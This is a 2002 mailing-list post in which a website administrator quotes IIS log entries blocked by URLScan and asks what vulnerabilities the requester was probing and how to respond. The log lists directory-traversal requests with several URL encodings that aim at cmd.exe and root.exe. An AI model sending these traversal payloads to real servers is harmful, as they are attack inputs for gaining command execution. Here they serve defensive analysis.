Hello all and forgive my ignorance in this area.

We are in the process of bringing our website in house.  It 
was being hosted
externally
The site is almost up and I was just poking at the logs and 
was intrigued by
what I saw.

Below is a snippet from the logs.  Can anyone tell by 
looking at it:

1.  What type of vulnerabilities were they looking for?
2.  Does the fact the it says <Rejected by urlscan> imply 
that URLScan from M$
is loaded.  I didn't do this myself...thats why I'm curious.
3.  What is the best course of action in regards to the 
individual attempting
these activities?  I traced the IP back to RoadRunner.  
Should I call their
customer service and complain or am I just pissing in the 
wind?
4.  I did run the IIS Lockdown wizard.  Is that sufficient 
for most types of
attacks?  What other tools should I consider running?

#Fields: date time c-ip cs-username s-ip s-port cs-method 
cs-uri-stem
cs-uri-query sc-status sc-win32-status cs(User-Agent)
2002-05-10 02:27:00 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/scripts/root.exe 404 123 -
2002-05-10 02:27:00 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/MSADC/root.exe 404 123 -
2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/c/winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/d/winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/scripts/..%255c../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/_vti_bin/..%255c../..%255c../..%
255c../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:01 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/_mem_bin/..%255c../..%255c../..%
255c../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:03 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%
1c../..%c1%1c../winnt/system32/cmd.exe

404 123 -
2002-05-10 02:27:03 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/scripts/..%c1%1c../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:04 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/scripts/..%c0%2f../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:04 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/scripts/..%c0%af../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:05 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/scripts/..%c1%9c../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:09 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/scripts/..%%35%63../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:11 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/scripts/..%%35c../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:12 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/scripts/..%25%35%63../winnt/system32/cmd.exe 404 123 -
2002-05-10 02:27:12 65.27.56.236 - 10.2.32.20 80 
GET /<Rejected-By-UrlScan>
~/scripts/..%252f../winnt/system32/cmd.exe 404 123 -

Thanks so much for this great list.

Craig Brauckmiller

Reply via email to